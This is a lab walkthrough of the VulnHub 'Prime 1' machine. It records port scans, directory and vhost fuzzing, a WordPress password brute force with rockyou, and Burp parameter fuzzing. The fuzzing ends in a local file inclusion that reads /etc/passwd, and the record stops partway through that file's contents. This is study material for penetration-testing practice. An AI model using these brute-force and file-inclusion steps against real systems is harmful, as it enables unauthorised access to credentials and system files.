THM: Prime et al
Updates
I’ve just done Love on HTB; no writeup obviously - it’s still an active box. I also did Prime 1 from VulnHub the other day and ermagerd this is lazy but….
## Ping the box, make sure it's up
┌──(root💀kali)-[/opt/vulnhub/prime1]
└─# ping 192.168.1.237
PING 192.168.1.237 (192.168.1.237) 56(84) bytes of data.
64 bytes from 192.168.1.237: icmp_seq=1 ttl=64 time=0.292 ms
^C
--- 192.168.1.237 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.292/0.292/0.292/0.000 ms
## Now run rustscan to see the open ports
┌──(root💀kali)-[/opt/vulnhub/prime1]
└─# rustscan -a 192.168.1.237 --ulimit 5000
ASCII ART NEVER WORKS
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Nmap? More like slowmap.🐢
[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 192.168.1.237:22
Open 192.168.1.237:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p ")
[~] Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-25 06:13 EDT
Initiating ARP Ping Scan at 06:13
Scanning 192.168.1.237 [1 port]
Completed ARP Ping Scan at 06:13, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 06:13
Completed Parallel DNS resolution of 1 host. at 06:13, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 06:13
Scanning 192.168.1.237 [2 ports]
Discovered open port 80/tcp on 192.168.1.237
Discovered open port 22/tcp on 192.168.1.237
Completed SYN Stealth Scan at 06:13, 0.02s elapsed (2 total ports)
Nmap scan report for 192.168.1.237
Host is up, received arp-response (0.00020s latency).
Scanned at 2021-05-25 06:13:32 EDT for 0s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:3B:70:71 (Oracle VirtualBox virtual NIC)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.18 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)
## Follow up with nmap to see the detail
┌──(root💀kali)-[/opt/vulnhub/prime1]
└─# nmap -T4 -p22,80 -A 192.168.1.237 -oA nmap/tcp_detail -vv
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-25 06:16 EDT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 06:16
Completed NSE at 06:16, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 06:16
Completed NSE at 06:16, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 06:16
Completed NSE at 06:16, 0.00s elapsed
Initiating ARP Ping Scan at 06:16
Scanning 192.168.1.237 [1 port]
Completed ARP Ping Scan at 06:16, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 06:16
Completed Parallel DNS resolution of 1 host. at 06:16, 0.00s elapsed
Initiating SYN Stealth Scan at 06:16
Scanning 192.168.1.237 [2 ports]
Discovered open port 80/tcp on 192.168.1.237
Discovered open port 22/tcp on 192.168.1.237
Completed SYN Stealth Scan at 06:16, 0.03s elapsed (2 total ports)
Initiating Service scan at 06:16
Scanning 2 services on 192.168.1.237
Completed Service scan at 06:16, 6.05s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.237
NSE: Script scanning 192.168.1.237.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 06:16
Completed NSE at 06:16, 0.26s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 06:16
Completed NSE at 06:16, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 06:16
Completed NSE at 06:16, 0.00s elapsed
Nmap scan report for 192.168.1.237
Host is up, received arp-response (0.00032s latency).
Scanned at 2021-05-25 06:16:09 EDT for 9s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8d:c5:20:23:ab:10:ca:de:e2:fb:e5:cd:4d:2d:4d:72 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDcSVb7n0rTb58TfCcHJgtutnZzqf0hl48jPxI+VHOyhiQIihkQVkshhc8LdnSUg2BRGZL+RFfNLan9Q6FY0D7T/7PMlggPtSLU80er3JJO+XMfO3NURgMtVtKS0m+nRbL9C/pKSgBewxIcPk7Y45aXjAo7tsSoJ3DZUDcaitfFbAlr+108VBSx/arOXbYtusI1E2OCj1v/VKgVA9N/FL/OHuloOZPs/hY0MoamQKy+XYNdyCtrvSeRmItf09YXhFJwfY9Tr/nk077J7cz3r3INP+AFrpKVjdUAtxNpb+zAJLMJY8WF7oRZ1B8Sdljsslkh8PPK8e6Z4/rlCaJYW0OX
| 256 94:9c:f8:6f:5c:f1:4c:11:95:7f:0a:2c:34:76:50:0b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPiCXK7fYpBhJbT1KsyJkcpdXc1+zrB9rHVxBPtvA9hwTF4R4dZCZI9IpMFrperU0wqI/8uGYF9mW8l3aOAhJqc=
| 256 4b:f6:f1:25:b6:13:26:d4:fc:9e:b0:72:9f:f4:69:68 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMKMh3392Cf8RmKX5UyT6C1yLIVbncwwUg1i2P7/ucKk
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: HacknPentest
MAC Address: 08:00:27:3B:70:71 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=5/25%OT=22%CT=%CU=36659%PV=Y%DS=1%DC=D%G=N%M=080027%TM
OS:=60ACCE72%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=101%TI=Z%II=I%TS=8)
OS:OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4
OS:ST11NW7%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)
OS:ECN(R=Y%DF=Y%T=40%W=7210%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%
OS:F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T
OS:5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=
OS:Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF
OS:=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40
OS:%CD=S)
Uptime guess: 61.977 days (since Wed Mar 24 06:49:32 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.32 ms 192.168.1.237
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 06:16
Completed NSE at 06:16, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 06:16
Completed NSE at 06:16, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 06:16
Completed NSE at 06:16, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.09 seconds
Raw packets sent: 25 (1.894KB) | Rcvd: 17 (1.366KB)
## Visit site and view page source; nothing interesting. Run dirsearch.
┌──(root💀kali)-[/opt/vulnhub/prime1]
└─# python3 /opt/dirsearch/dirsearch.py -u 192.168.1.237
/opt/dirsearch/thirdparty/requests/__init__.py:91: RequestsDependencyWarning: urllib3 (1.26.4) or chardet (4.0.0) doesnt match a supported version!
warnings.warn("urllib3 ({}) or chardet ({}) doesnt match a supported "
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10848
Error Log: /opt/dirsearch/logs/errors-21-05-25_06-18-10.log
Target: http://192.168.1.237/ Output File: /opt/dirsearch/reports/192.168.1.237/_21-05-25_06-18-10.txt
[06:18:10] Starting:
[06:18:11] 403 - 299B - /.ht_wsr.txt
[06:18:11] 403 - 302B - /.htaccess.bak1
[06:18:11] 403 - 304B - /.htaccess.sample
[06:18:11] 403 - 302B - /.htaccess.save
[06:18:11] 403 - 302B - /.htaccess.orig
[06:18:11] 403 - 300B - /.htaccessOLD
[06:18:11] 403 - 301B - /.htaccessOLD2
[06:18:11] 403 - 302B - /.htaccess_orig
[06:18:11] 403 - 300B - /.htaccessBAK
[06:18:11] 403 - 300B - /.htaccess_sc
[06:18:11] 403 - 303B - /.htaccess_extra
[06:18:11] 403 - 292B - /.htm
[06:18:11] 403 - 293B - /.html
[06:18:11] 403 - 298B - /.htpasswds
[06:18:11] 403 - 299B - /.httr-oauth
[06:18:11] 403 - 302B - /.htpasswd_test
[06:18:12] 403 - 292B - /.php
[06:18:12] 403 - 293B - /.php3
[06:18:20] 200 - 131B - /dev
[06:18:22] 200 - 147B - /image.php
[06:18:22] 200 - 136B - /index.php
[06:18:22] 200 - 136B - /index.php/login/
[06:18:22] 301 - 319B - /javascript -> http://192.168.1.237/javascript/
[06:18:26] 403 - 302B - /server-status/
[06:18:26] 403 - 301B - /server-status
[06:18:29] 200 - 3KB - /wordpress/wp-login.php
[06:18:29] 200 - 11KB - /wordpress/
Task Completed
## Visit /dev
-------------------
hello,
now you are at level 0 stage.
In real life pentesting we should use our tools to dig on a web very hard.
Happy hacking.
-------------------
## Visit /wordpress; run wpscan
Appears to be WordPress, with one post and a single author, *victor*.
┌──(root💀kali)-[/opt/vulnhub/prime1]
└─# wpscan -e --url http://192.168.1.237/wordpress --api-token REDACTED --plugins-detection aggressive
_______________________________________________________________
[+] URL: http://192.168.1.237/wordpress/ [192.168.1.237]
[+] Started: Tue May 25 06:20:31 2021
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.1.237/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.1.237/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.1.237/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.1.237/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.2.2 identified (Insecure, released on 2019-06-18).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.1.237/wordpress/?feed=rss2, <generator>https://wordpress.org/?v=5.2.2</generator>
| - http://192.168.1.237/wordpress/?feed=comments-rss2, <generator>https://wordpress.org/?v=5.2.2</generator>
|
| [!] 31 vulnerabilities identified:
|
| [!] Title: WordPress 5.2.2 - Cross-Site Scripting (XSS) in Stored Comments
| Fixed in: 5.2.3
| References:
| - https://wpscan.com/vulnerability/1b880386-021d-43b1-9988-e196955c7a3e
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16218
| - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
|
Not interesting; removed
[+] WordPress theme in use: twentynineteen
| Location: http://192.168.1.237/wordpress/wp-content/themes/twentynineteen/
| Last Updated: 2021-03-09T00:00:00.000Z
| Readme: http://192.168.1.237/wordpress/wp-content/themes/twentynineteen/readme.txt
| [!] The version is out of date, the latest version is 2.0
| Style URL: http://192.168.1.237/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4
| Style Name: Twenty Nineteen
| Style URI: https://wordpress.org/themes/twentynineteen/
| Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.4 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.1.237/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'
[+] Enumerating Vulnerable Plugins (via Aggressive Methods)
Checking Known Locations - Time: 00:00:03 <==========================================================================================================================================> (2591 / 2591) 100.00% Time: 00:00:03
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] No plugins Found.
[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:00 <============================================================================================================================================> (349 / 349) 100.00% Time: 00:00:00
[+] Checking Theme Versions (via Passive and Aggressive Methods)
[i] No themes Found.
[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:03 <==========================================================================================================================================> (2575 / 2575) 100.00% Time: 00:00:03
[i] No Timthumbs Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <=============================================================================================================================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Enumerating DB Exports (via Passive and Aggressive Methods)
Checking DB Exports - Time: 00:00:00 <===================================================================================================================================================> (70 / 70) 100.00% Time: 00:00:00
[i] No DB Exports Found.
[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
Brute Forcing Attachment IDs - Time: 00:00:01 <========================================================================================================================================> (100 / 100) 100.00% Time: 00:00:01
[i] No Medias Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <==============================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] victor
| Found By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] WPScan DB API OK
| Plan: free
| Requests Done (during the scan): 3
| Requests Remaining: 22
[+] Finished: Tue May 25 06:20:47 2021
[+] Requests Done: 5884
[+] Cached Requests: 9
[+] Data Sent: 1.684 MB
[+] Data Received: 1.325 MB
[+] Memory used: 255.184 MB
[+] Elapsed time: 00:00:15
Not very interesting
Visit http://192.168.1.237/wordpress/wp-content/uploads
Nothing
## Fuzz
┌──(root💀kali)-[/opt/vulnhub/prime1]
└─# feroxbuster -u http://192.168.1.237 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.2.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.1.237
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.2.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
200 7l 26w 131c http://192.168.1.237/dev
403 11l 32w 301c http://192.168.1.237/server-status
301 9l 28w 319c http://192.168.1.237/javascript
301 9l 28w 326c http://192.168.1.237/javascript/jquery
200 10351l 43235w 284394c http://192.168.1.237/javascript/jquery/jquery
301 9l 28w 318c http://192.168.1.237/wordpress
301 9l 28w 329c http://192.168.1.237/javascript/prototype
301 9l 28w 327c http://192.168.1.237/wordpress/wp-admin
🚨 Caught ctrl+c 🚨 saving scan state to ferox-http_192_168_1_237-1621938928.state ...
[########>-----------] - 13m 3169419/7642710 18m found:8 errors:170
[###################>] - 13m 1224635/1273785 1518/s http://192.168.1.237
[##########>---------] - 11m 653362/1273785 939/s http://192.168.1.237/javascript
[#########>----------] - 11m 629594/1273785 915/s http://192.168.1.237/javascript/jquery
[#######>------------] - 9m 461867/1273785 794/s http://192.168.1.237/wordpress
[##>-----------------] - 4m 174995/1273785 618/s http://192.168.1.237/javascript/prototype
[>-------------------] - 50s 24960/1273785 495/s http://192.168.1.237/wordpress/wp-admin
## Cancelled
Add:
192.168.1.237 prime1
to /etc/hosts
## Vhosts scan
┌──(root💀kali)-[/opt/vulnhub/prime1]
└─# wfuzz -c -f sub-fighter -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u "http://prime1" -H "Host: FUZZ.prime1" -t 42 --hw 12
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzzs documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://prime1/
Total requests: 114441
=====================================================================
ID Response Lines Word Chars Payload
000009532: 400 12 L 53 W 422 Ch "#www"
000010581: 400 12 L 53 W 422 Ch "#mail"
000047706: 400 12 L 53 W 422 Ch "#smtp"
000103135: 400 12 L 53 W 422 Ch "#pop3"
Total time: 83.20830
Processed Requests: 114441
Filtered Requests: 114437
Requests/sec.: 1375.355
Nothing
## Try password attack on wordpress
┌──(root💀kali)-[/opt/vulnhub/prime1]
└─# wpscan -U victor -P /usr/share/wordlists/rockyou.txt --url http://prime1/wordpress
_______________________________________________________________
[+] URL: http://prime1/wordpress/ [192.168.1.237]
[+] Started: Tue May 25 06:39:06 2021
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://prime1/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://prime1/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://prime1/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://prime1/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.2.2 identified (Insecure, released on 2019-06-18).
| Found By: Emoji Settings (Passive Detection)
| - http://prime1/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.2.2'
| Confirmed By: Meta Generator (Passive Detection)
| - http://prime1/wordpress/, Match: 'WordPress 5.2.2'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <=============================================================================================================================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Performing password attack on Wp Login against 1 user/s
^Cying victor / 080492 Time: 00:07:20 < > (20115 / 14344392) 0.14% ETA: 87:08:03
[i] No Valid Passwords Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output. > (20117 / 14344392) 0.14% ETA: 87:07:39
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue May 25 06:46:31 2021
[+] Requests Done: 20286
[+] Cached Requests: 4
[+] Data Sent: 6.74 MB
[+] Data Received: 89.833 MB
[+] Memory used: 239.996 MB
[+] Elapsed time: 00:07:25
Scan Aborted: Canceled by User
Cancel after no quick hits
## More fuzzing
┌──(root💀kali)-[/opt/vulnhub/prime1]
└─# feroxbuster -u http://192.168.1.237 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x txt,php,zip,log,bak --no-recursion
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.2.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.1.237
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/common.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.2.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
💲 Extensions │ [txt, php, zip, log, bak]
🚫 Do Not Recurse │ true
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
403 11l 32w 301c http://192.168.1.237/server-status
200 7l 12w 136c http://192.168.1.237/index.php
301 9l 28w 319c http://192.168.1.237/javascript
200 15l 69w 412c http://192.168.1.237/secret.txt
200 6l 12w 147c http://192.168.1.237/image.php
403 11l 32w 297c http://192.168.1.237/.htpasswd
403 11l 32w 301c http://192.168.1.237/.htpasswd.txt
403 11l 32w 301c http://192.168.1.237/.htpasswd.php
403 11l 32w 301c http://192.168.1.237/.htpasswd.zip
403 11l 32w 301c http://192.168.1.237/.htpasswd.log
403 11l 32w 301c http://192.168.1.237/.htpasswd.bak
301 9l 28w 318c http://192.168.1.237/wordpress
200 7l 26w 131c http://192.168.1.237/dev
403 11l 32w 297c http://192.168.1.237/.htaccess
403 11l 32w 301c http://192.168.1.237/.htaccess.txt
403 11l 32w 301c http://192.168.1.237/.htaccess.php
403 11l 32w 301c http://192.168.1.237/.htaccess.zip
403 11l 32w 301c http://192.168.1.237/.htaccess.log
403 11l 32w 301c http://192.168.1.237/.htaccess.bak
403 11l 32w 292c http://192.168.1.237/.hta
403 11l 32w 296c http://192.168.1.237/.hta.txt
403 11l 32w 296c http://192.168.1.237/.hta.php
403 11l 32w 296c http://192.168.1.237/.hta.zip
403 11l 32w 296c http://192.168.1.237/.hta.log
403 11l 32w 296c http://192.168.1.237/.hta.bak
[####################] - 8s 140430/140430 0s found:25 errors:0
[####################] - 7s 28086/28086 3722/s http://192.168.1.237
Visit http://192.168.1.237/secret.txt
## Getting somewhere
----------------
Looks like you have got some secrets.
Ok I just want to do some help to you.
Do some more fuzz on every page of php which was finded by you. And if
you get any right parameter then follow the below steps. If you still stuck
Learn from here a basic tool with good usage for OSCP.
https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web
//see the location.txt and you will get your next move//
----------------
## Doesn't exist?
http://192.168.1.237/location.txt does not exist
## Burpsuite parameter fuzzing
Try GET /image.php?%s=./secret.txt HTTP/1.1
with /usr/share/seclists/Discovery/Web-Content/common.txt as the parameter-name wordlist
in Turbo Intruder: nothing.
Also try /etc/passwd as the value, and POST requests. Then
GET /index.php?file=secret.txt HTTP/1.1
with the *file* parameter returns:
HTTP/1.1 200 OK
Date: Tue, 25 May 2021 10:54:28 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 169
Keep-Alive: timeout=5, max=65
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" />
</body>
Do something better <br><br><br><br><br><br>you are digging wrong file</html>
## Fuzz harder for more PHP?
feroxbuster -u http://192.168.1.237 -w /usr/share/seclists/Discovery/Web-Content/big.txt -x php -C 403 -d 2
feroxbuster -u http://192.168.1.237 -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -x php -C 403 -d 1
feroxbuster -u http://192.168.1.237 -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php -C 403 -d 1
┌──(root💀kali)-[/opt/vulnhub/prime1]
└─# feroxbuster -u http://192.168.1.237 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x php,txt -C 403 -d 1
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.2.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.1.237
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405]
💢 Status Code Filters │ [403]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.2.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
💲 Extensions │ [php, txt]
🔃 Recursion Depth │ 1
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
200 15l 69w 412c http://192.168.1.237/secret.txt
301 9l 28w 318c http://192.168.1.237/wordpress
301 9l 28w 319c http://192.168.1.237/javascript
200 6l 12w 147c http://192.168.1.237/image.php
200 7l 12w 136c http://192.168.1.237/index.php
200 7l 26w 131c http://192.168.1.237/dev
[####################] - 9m 7642710/7642710 0s found:6 errors:0
[####################] - 9m 3821355/3821355 6723/s http://192.168.1.237
## No; back to Burpsuite parameter fuzzing
GET /index.php?file=location.txt HTTP/1.1
HTTP/1.1 200 OK
Date: Tue, 25 May 2021 11:36:55 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 334
Connection: close
Content-Type: text/html; charset=UTF-8
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" />
</body>
Do something better <br><br><br><br><br><br>ok well Now you reah at the exact parameter <br><br>Now dig some more for next one <br>use 'secrettier360' parameter on some other php page for more fun.
</html>
GET /image.php?secrettier360=location.txt HTTP/1.1
Host: 192.168.1.237
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Tue, 25 May 2021 11:37:19 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 197
Connection: close
Content-Type: text/html; charset=UTF-8
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br></html>
GET /image.php?secrettier360=/etc/passwd HTTP/1.1
Host: 192.168.1.237
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Tue, 25 May 2021 11:37:27 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 2616
Connection: close
Content-Type: text/html; charset=UTF-8
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
